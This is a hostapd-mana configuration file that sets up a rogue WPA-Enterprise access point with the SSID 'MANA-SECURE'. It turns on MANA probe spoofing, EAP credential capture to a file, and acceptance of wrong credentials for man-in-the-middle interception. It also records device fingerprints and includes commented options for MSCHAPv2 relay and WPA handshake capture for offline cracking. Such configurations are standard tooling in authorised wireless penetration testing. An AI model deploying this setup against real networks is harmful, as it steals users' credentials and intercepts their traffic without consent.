#A full description of options is available in https://github.com/sensepost/hostapd-mana/blob/master/hostapd/hostapd.conf 

#First AP
interface=wlan1
driver=nl80211
ssid=MANA-SECURE
bridge=br-lan

# 2.4 GHz setting below here
channel=6
hw_mode=g

# 5 GHz Settings below here (disabled by default)
# You will have to disable all of the 2.4GHz settings above to make this work
#channel=48
#hw_mode=a

# I have not tested this yet!
#ieee80211ac=1

# MIMO + QoS
ieee80211n=1
wmm_enabled=1

ht_coex=0
ht_capab=[SHORT-GI-20][SHORT-GI-40][RX-STBC1][DSSS_CCK-40]
preamble=1

# EAP Settings
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=/etc/hostapd-mana/hostapd.eap_user
ca_cert=/etc/hostapd-mana/cert/rogue-ca.pem
server_cert=/etc/hostapd-mana/cert/radius.pem
private_key=/etc/hostapd-mana/cert/radius.key
private_key_passwd=
dh_file=/etc/hostapd-mana/cert/dhparam.pem
pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f
eap_fast_a_id=101112131415161718191a1b1c1d1e1f
eap_fast_a_id_info=test server
eap_fast_prov=3
pac_key_lifetime=604800
pac_key_refresh_time=86400
wpa=1
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP

# Prevent dissasociations
disassoc_low_ack=0
ap_max_inactivity=3000

# Both open and shared auth
auth_algs=3

# no SSID cloaking
ignore_broadcast_ssid=2

# -1 = log all messages
logger_syslog=-1
logger_stdout=-1

# 2 = informational messages
logger_syslog_level=1
logger_stdout_level=1

ctrl_interface=/var/run/hostapd-mana
ctrl_interface_group=0

# Finally, enable mana
enable_mana=1
# Limit mana to responding only to the device probing (0), or not (1)
mana_loud=0
# Extend MAC ACLs to probe frames
mana_macacl=0
# Put hostapd in white/black list mode
macaddr_acl=0
# only used if you want to do filter by MAC address
#accept_mac_file=/etc/hostapd-mana/hostapd.accept
deny_mac_file=/etc/hostapd-mana/hostapd.deny

# (new feature)
# By default, MANA will behave the same for all SSIDs. Enabling this filter will
# use a white-list file of allowed SSIDs, so all others SSID-probes will be ignored
#mana_ssid_filter_file=/etc/hostapd-mana/hostapd.ssid_filter

# Taxonomy and device fingerprinting! Awesome!
# Dump seen device activity to a file
# Will include MAC (randomised or not
# <MAC>, <SSID>, <Random 1, or not 0>, <TAXONOMY>
mana_outfile=/tmp/hostapd-mana.out
track_sta_max_num=100
track_sta_max_age=180

# Enable EAP credential capture mode (aka WPE)
# Make sure you configure a file to write these too with mana_credout below
# otherwise you'll have to catch them as they scroll past on the screen.
# Off by default
mana_wpe=1

# by hashcat/jtr/asleap or similar. TTLS/MSCHAP TTLS/CHAP TTLS/PAP will also be
# captured. The mode will be designated at the start of the line, separated
# from the cracking string by a tab if you'd like to grep & cut.
mana_credout=/tmp/hostapd.credout

#Enabled EAP Success mode (from WPE)
# Allow clients to connect with incorrect credentials
# Most often, when rogue AP'ing you won't have the clients creds
# But still want a shot at collecting them via MitM
mana_eapsuccess=1
mana_eaptls=1

# EAP Relay with Sycophant
# it's possible to relay inner MSCHAPv2 to get connected to PEAP networks without having to crack the credentials.
# This attack requires an appropriately configured hostapd-mana and the wpa_sycophant tool.
# To enable this attack, you need the following config options enabled/set
#enable_sycophant=1
#sycophant_dir=/tmp/

# WPA Handshake capturing!
# WARNING, YOU HAVE TO DISABLE MANA WHILE USING THIS!
# THEY WILL NOT WORK TOGETHER!
# Mana can capture handshakes and write them to a file, ready to be cracked in hashcat (hccapx) format.
# You can enable this with the following config option
#mana_wpaout=/tmp/hostapd.hccapx
